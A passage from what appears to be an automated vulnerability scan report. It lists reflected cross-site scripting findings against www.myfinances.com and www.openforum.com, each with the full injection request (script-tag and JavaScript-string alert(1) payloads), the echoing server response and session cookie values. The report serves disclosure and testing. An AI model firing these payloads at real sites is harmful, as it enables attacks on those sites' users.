The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a33a3"><script>alert(1)</script>f30bec36298 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13681 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Creating Your Own Dividends' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241183.html?a33a3"><script>alert(1)</script>f30bec36298=1'"> ...[SNIP]...
4.490. http://www.myfinances.com/blog/3241193.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3241193.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d892b"><script>alert(1)</script>28506c4b154 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 14125 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Protect Yourself From Inflation' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3241193.html?d892b"><script>alert(1)</script>28506c4b154=1'"> ...[SNIP]...
4.491. http://www.myfinances.com/blog/3299523.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299523.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7dffd"><script>alert(1)</script>ccc9f3547f8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:39 GMT Content-Length: 13301 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Don't Forget About Inflation Risk' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299523.html?7dffd"><script>alert(1)</script>ccc9f3547f8=1'"> ...[SNIP]...
4.492. http://www.myfinances.com/blog/3299533.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299533.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3cbc8"><script>alert(1)</script>473ebcbf25d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:56 GMT Content-Length: 13628 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'Who is JTWROS and Why are They Listed on My Account Statement?' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299533.html?3cbc8"><script>alert(1)</script>473ebcbf25d=1'"> ...[SNIP]...
4.493. http://www.myfinances.com/blog/3299543.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299543.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86ca0"><script>alert(1)</script>6a9de3808f3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:05:03 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:05:03 GMT Content-Length: 13601 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How to Choose an Appropriate Target Date Fund' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299543.html?86ca0"><script>alert(1)</script>6a9de3808f3=1'"> ...[SNIP]...
4.494. http://www.myfinances.com/blog/3299553.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /blog/3299553.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f745d"><script>alert(1)</script>799a50af86f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:04:54 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:04:54 GMT Content-Length: 13663 Connection: close Set-Cookie: adc=RSP; path=/;
<head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <meta name="generator" content="1b0d0ec2fefe4b82a285 ...[SNIP]... <a target="_blank" href="http://twitter.com/home?status=Check out this 'How To Choose Between a Traditional 401(K) and a Roth 401(K)' on 'MyFinances.com'! 'http://www.myfinances.com/blog/3299553.html?f745d"><script>alert(1)</script>799a50af86f=1'"> ...[SNIP]...
4.495. http://www.myfinances.com/budget.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /budget.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91d41"><script>alert(1)</script>3d8e0c43e90 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /budget.php?91d41"><script>alert(1)</script>3d8e0c43e90=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:20 GMT Content-Length: 21653 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=r5fgdi9rsbvhrv1uang897d6f7; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-ep3Zgx3x55wzjtYGmmA8IHHkMtnMePS5Wjisha7wpvxzTpOwlpCxTnjUY2Nzh3vrxUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQKB8ZM44-LhR9KSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn7X_rYpwmUw7b4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e9843'><script>alert(1)</script>2707c201b22 was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountse9843'><script>alert(1)</script>2707c201b22&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:41 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:41 GMT Content-Length: 19651 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.28CKOUU; path=/ Set-Cookie: PHPSESSID=8mri1qtefnba9k49k4ep3nl8h2; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-eno6Jjl93N8GpduxNYGBxG5Y6FFxht_Njk7BPyPmzIQKHUnSLStdd3m_SBtFRIWv2UYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJMGm4g2vKixNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn5Ae7198oJNXL4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
The value of the query request parameter is copied into the HTML document as plain text between tags. The payload a2ce6<script>alert(1)</script>826352099bb was submitted in the query parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /budget.php?query=savings+accountsa2ce6<script>alert(1)</script>826352099bb&mfid=mf-4d404e8fe4f0d&mfs=adwc&&client=ca-dp-r-mark03_3ph_js HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response (redirected)
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 15:55:45 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 15:55:45 GMT Content-Length: 19629 Connection: close Set-Cookie: ARPT=VRWOZXS192.168.100.26CKOUQ; path=/ Set-Cookie: PHPSESSID=u15624i2oae1adjjrl0fa5mn65; path=/ Set-Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136 Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-mcyYKvi6WopOasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: uvx=ogz9gkn6ApsPfhYM2mO-enLhu7KjEvXpkJfrfAQOnZ1eEyEUcIq0WVmXir4NGwcZbmUHGK2l4Dwd73MuXjqeOUYhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GxkrTkausPQJ6pTPd4ZzeqNKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORAImKB8G3bn6nygrYAfQJ-r4CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL; expires=Wed, 03-Feb-2021 06:00:00 GMT; path=/ Set-Cookie: adc=RSP; path=/;
4.498. http://www.myfinances.com/contact.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.myfinances.com
Path: /contact.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 613cb'><script>alert(1)</script>8f2541e63ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contact.html?613cb'><script>alert(1)</script>8f2541e63ae=1 HTTP/1.1 Host: www.myfinances.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: acache=0f6ad7bba76fc105e776602dd2eeebb59a5e65ef-96bb1dfba832b3d02f58633d63038a24dcfab136; PHPSESSID=i38rv6rueenlkehkfpegmlf4q3; ARPT=VRWOZXS192.168.100.27CKOUJ; adc=RSP; uvx=ogz9gkn6ApsPfhYM2mO-erklLaxNIV-BVXrW6aRo-n_AJPK2QUOhd0Abjk7C8k0uK8mLPFc-LluxlSpLwBNV_0YhxlQO-o-kf_in1Ri2_CHOcsANvX5k8_r8Rvq_KR_GreyyNfUIbjPAxBUpoNm3wdKSMBYXqgLeYEENLOWsxn5Eble1QxvJLK-74N00-QORgnctmlpQA6dRDOE8qtWYP74CTEiWPaQLH4pwjPOr-md8j6Mr45xQnasoZwBdSfN83QxsFl1X1Wt1Pn-aDBqzVVZjTCYnXgCL;
Response
HTTP/1.1 200 OK Server: Apache P3P: policyref="http://www.myfinances.com/xml/p3p.xml", CP="CURa ADMa DEVa PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR" Content-Type: text/html; charset=UTF-8 Expires: Thu, 03 Feb 2011 17:02:44 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 17:02:44 GMT Content-Length: 8051 Connection: close Set-Cookie: adc=RSP; path=/;
4.499. http://www.openforum.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.openforum.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 54350'-alert(1)-'b64566be317 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?54350'-alert(1)-'b64566be317=1 HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 Expires: Thu, 03 Feb 2011 13:50:31 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:31 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2735450304.20480.0000; path=/ Content-Length: 102188
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the cid request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a4b2f'-alert(1)-'731207dc1c was submitted in the cid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /?cid=inav_homea4b2f'-alert(1)-'731207dc1c&inav=menu_business_openforum HTTP/1.1 Host: www.openforum.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Content-Type: text/html; charset=utf-8 SSL: True Expires: Thu, 03 Feb 2011 13:50:42 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Thu, 03 Feb 2011 13:50:42 GMT Connection: close Connection: Transfer-Encoding Set-Cookie: plv=lv=af6b38e2-af41-4de2-b212-3468d374f14c; path=/ Set-Cookie: BIGipServerAmex=2785781952.20480.0000; path=/ Content-Length: 102363
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
The value of the inav request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1db04'-alert(1)-'749ae354a20 was submitted in the inav parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
